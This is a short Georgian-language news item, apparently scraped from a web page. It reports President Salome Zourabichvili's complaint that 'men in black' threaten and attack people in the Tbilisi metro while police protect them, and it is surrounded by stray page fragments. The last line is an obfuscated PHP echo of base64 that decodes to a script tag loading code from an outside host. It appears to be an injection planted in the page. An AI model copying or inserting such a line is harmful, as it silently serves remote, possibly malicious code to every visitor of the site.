gorgia
ავერსი jaluzi

თბილისის მეტროში „კაცები შავებში“ იგინებიან, იმუქრებიან და ძალადობას ავრცელებენ, - ამის შესახებ საქართველოს პრეზიდენტი, სალომე ზურაბიშვილი სოციალურ ქსელში წერს.

„თბილისის მეტროში „კაცები შავებში“ იგინებიან, იმუქრებიან და ძალადობას ავრცელებენ. მოქალაქეების დასაცავად არც პოლიცია და არც სამართალდამცავები არიან!“, - წერს საქართველოს პრეზიდენტი.

არსებული ინფორმაციით, რუსთაველის გამზირზე "თბილისი მერიოტის" მიმდებარედ ერთ-ერთ კაფეში ე.წ. "ტიტუშკები" ხალხს უსწორდებოდნენ, პოლიცია კი მათ იცავდა.

პოლიციამ ისინი მანქანაში ჩასვა და სიტუაციას განარიდა. შინაგან საქმეთა სამინისტროს თანამშრომლები არ ამბობენ დააკავეს თუ არა ეს ადამიანები.

100
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");